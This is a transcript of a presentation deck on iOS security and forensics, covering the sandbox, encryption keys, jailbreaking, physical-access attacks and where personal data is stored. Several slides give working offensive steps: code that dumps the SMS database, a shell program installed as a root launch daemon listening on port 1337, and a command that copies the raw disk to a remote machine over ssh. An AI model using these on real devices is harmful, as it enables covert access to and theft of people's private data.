powerpoint templates page 1 powerpoint templates ios security and forensics
TRANSCRIPT
Powerpoint TemplatesPage 2
Apple’s Security Model
- iDevice applications available on Apple Store
- Tested, analyzed, approved, signed then distributed by Apple services
- Installed in:- /private/var/mobile/Applications/{Unique_App_ID}
- Full list of installed applications :- /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist
- Executed under “mobile” user in TrustedBSD sandbox
- ASLR and DEP activated- All that, on a fully encrypted filesystem.
Powerpoint TemplatesPage 4
TrustedBSD Sandbox
- Open source project for FreeBSD systems- Sponsored by Apple, Google, Yahoo!,
NSA…- Modified and used by Apple for OS X and
iOS- Installs series of hooks, in order to
intercept and filter syscalls.- Policy retrieved from a human readable file
then passed to the kernel in a binary format.
- Finally the kernel installs sanbox rules for the process
Powerpoint TemplatesPage 5
Policy rules
- Stored in /usr/share/sandbox and hardcoded in the Kernel- Some policies configuration are done by the user through popups- Written in ESDL schema, human readable:
(version 1)(allow default)(deny file-read-data (regex #”^/private/tmp/test\.c$”))
- $ sandbox_exec –p ‘{$POLICY}’ /bin/sh- $ file /private/tmp/test.ctest.c: cannot open: Operation not permitted
- $ sandbox_exec –n no-internet /bin/sh- $ ping 4.2.2.2ping: sendto: Operation not permitted
- The sandbox_init() syscall uses the libsandbox.dylib to convert the policy into binary format.
Powerpoint TemplatesPage 6
iDevice Storage Device
NAND storage device exploited like the following:- BOOT (block 0): contains the bootloader- PLOG (block 1) : contains the EMF, BAG1 and Dkey
- EMF : used to encrypt the entire filesystem and HFS journal- BAG1 : used to encrypt the keybag- Dkey : used to encrypt files without encryption policy class
- NVM (block 2-7) : stores the NVRAM parameters- FIRM (block 8-15) : stores the firmware, iBoot, device tree & logos- FSYS (block 16-4084): stores the encrypted filesystem- RSRV (last 15 blocks): reserved
Powerpoint TemplatesPage 7
Encryption mechanism
Starting from iPhone 3GS, Apples devices contain hardware encryption processor. It permit the following: - UID keys stored in the processor - 0x835 & 0x89B keys derived from the UID key- Filesystem :
- Data partition encrypted with EMF (AES-128)- System partition encrypted with hardcoded AES-256 key (in kernel & bootloaders)
- Keychain encryption with the Dkey
- The Keybag contains Master Keys for Protection Classes- Some Master Keys encrypted with passcode
- Each file on the filesystem encrypted with a “cprotect” key- Each “cprotect” key is encrypted with the file’s associated Protection Class Master Key
At boot, the EMF and Dkey are extracted automatically
Powerpoint TemplatesPage 8
Protection Classes
Files decryption is defined according to their associated “Protection Classes”.
Protection Classes used for files:- NSFileProtectionComplete: file only decrypted when the iDevice is unlocked.- NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stay decrypted even after lock if the application maintains it open.- NSFileProtectionCompleteUntilUserAuthentication: file decrypted after a successful unlock. It remains decrypted until next reboot.- NSFileProtectionNone: file decrypted using the Dkey.- NSFileProtectionRecovery: undocumented.
Protection Classes used for keychains:- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]- kSecAttrAccessibleAlways[ThisDeviceOnly]
Powerpoint TemplatesPage 9
Data wiping and recovery
- Filesystem’s wiping consists of rewriting the EMF & Dkey
- Files deletion consists of rewriting the associated cprotect
- The filesystem’s journal:- encrypted with the Dkey- contains cprotect keys in cleartext- rotation depending on filesystem’s activity- could be retrieved and used to recover deleted files
- /dev/disk0s1s2 raw data backup:- Connect the iDevice to power supply- Disable the autolock- Run:
$ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/{$USER}/dump.dmg'
- Wait… for… a… while….
Powerpoint TemplatesPage 11
Jailbreak- Execution of third party applications/code allowed- Unsigned code execution granting (depending on jailbreaks)- Complete bypass of the sandbox- Root (/) partition mounted in read/write.
- Before jailbreak:- $ cat /etc/fstab
/dev/disk0s1 / hfs r 0 1
/dev/disk2s1 /private/var hfs rw 0 2- After jailbreak:- $ cat /etc/fstab
/dev/disk0s1 / hfs rw 0 1
/dev/disk2s1 /private/var hfs rw 0 2
Note: on iOS >=5, /dev/disk2s1 became /dev/disk1s2
Powerpoint TemplatesPage 12
Useful information- launchd: first executed binary while booting (init like)- watchdog: checks if a process is running in memory more than 5mn, if yes it reboots the iDevice- launchctl : used to control daemons
- $ launchctl load com.adel.reverse_shell.plist
- ldid: Link Identity Editor, used to sign a binary- $ ldid –S my_binary- usbmux: protocol created to encapsulate TCP over USB connections. Optimized and used by iTune.- XCode: developpment platform on Mac OS X, freely downloadable on Apple Store- Cydia Store: online non official applications store for jailbroken devices- SSH binaries: freely available package over Cydia store.
Powerpoint TemplatesPage 13
HelloWorld for iDevice- Simple HelloWorld\n program:
- $ cat helloworld.c#include <stdio.h>int main(int argc, char *argv[]){
printf(“HelloWorld\n”);return 0;
}
- $ export PF=/Developer/Platforms/iPhoneOS.platform- $ $PF/Developer/usr/boin/arm-apple-darwin10-llvm-gcc-4.2 -o hello hello.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/
- Binary auto-siging:-$ ldid –S hello
- Simple binary file transfer over SSH:- $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary
Powerpoint TemplatesPage 14
Local File Disclosure
-$ cat lfi_smsdb.c
#include <stdio.h>
main(){ FILE *fp=NULL; int c=0; fp=fopen("/var/mobile/Library/SMS/sms.db","r"); do { c=fgetc(fp); printf("%c",c); } while (!feof(fp)); fclose(fp); return 0;}
Powerpoint TemplatesPage 15
Reverse Shell
-$ cat reverse_shell.c
#include <stdio.h>#include <unistd.h>
main(){
execve("/bin/sh", NULL, NULL);return 0;
}
Powerpoint TemplatesPage 16
Process Daemonizing
- Copying reverse_shell to the iDevice /usr/bin
- Copying com.adel.reverse_shell.plist to the iDevice /System/Library/LaunchDaemons/
- Rebooting the iDevice or :- $ cd /System/Library/LaunchDaemons- $ launchctl load ./com.adel.reverse_shell.plist
Powerpoint TemplatesPage 17
plist Manifest Format
- XML file format, used for configuration purpose
- $ cd /System/Library/LaunchDaemons- $ cat com.adel.reverse_shell.plist<?xml version="1.0" encoding="UTF-8"?><plist version="1.0">...<key>Label</key><string>com.adel.reverse_shell</string> <key>Program</key> <string>/usr/bin/reverse_shell</string><key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>1337</string> </dict> </dict>...</plist>
Powerpoint TemplatesPage 18
Physical Access Pwnage
Many possibilities:
-Easy: the iDevice does not have passcode- Full access to data over SpringBoard, SSH or after boot on ramdisk
- Medium: the iDevice has a passcode < 4 digits- Booting on ramdisk, patching the kernel and cracking the passcode- Needs max 30mn of passcode cracking (10^4 possibilities)
- Medium ++: the iDevice has a passcode > 5 digits- Could take time for cracking- The xkcd 5$ wrench shall be used !
- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with that)- ? Does it exist ?
Powerpoint TemplatesPage 19
LiveCD vs RAMDISK
- A 2mb HFS+ container with:- customized launchd- binaries to copy/execute- plist files
- Loaded into the iDevice over USB and after reboot to DFU mode- exploit the iDevice vulnerability- load the ramdisk on RAM- execute launchd
- disable watchdog- option 1:
- scan and mount the filesystem (EMF + Dkey auto-extracted)- copy files on the filesystem- chroot on the mounted filesystem- option 2:- initialize the usbmux protocol- read and send raw NAND data over USB (EMF + Dkey must be extracted manually
Powerpoint TemplatesPage 20
Sensitive Data
- Keyboard cache- Clipboard buffer- Consolidated GPS positions databse and latest GPS position- Applications and Safari snapshot cache- Google maps cache and history- Address book, photos, songs, voice records, notes, calendar, call history- SMS, MMS, drafts and SpotLight SMS cache- Geolocalization tags on photos- Safari cache, search list, bookmarks, cookies, history and WebKit cache- Installed applications list- Emails, applications, their data and cache- Lastest dialed number, bookmarked contact list, IMSI, ICCID- Configured access point list…
Powerpoint TemplatesPage 21
Keyboard Cache
Contains the keyboard cache- Written known and unknown words- One cache per language- Available in /private/var/mobile/Library/Keyboard/
Powerpoint TemplatesPage 23
Applications snapshot
Available in:$ /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg
Powerpoint TemplatesPage 24
Consolidated GPS Positions Databse
Available in:$ /private/var/root/Library/Caches/locationd/consolidated.db
Powerpoint TemplatesPage 25
Consolidated GPS Positions Databse
Available in:$ /private/var/root/Library/Caches/locationd/consolidated.db
Powerpoint TemplatesPage 26
Consolidated GPS Positions Databse
Available in:$ /private/var/root/Library/Caches/locationd/consolidated.db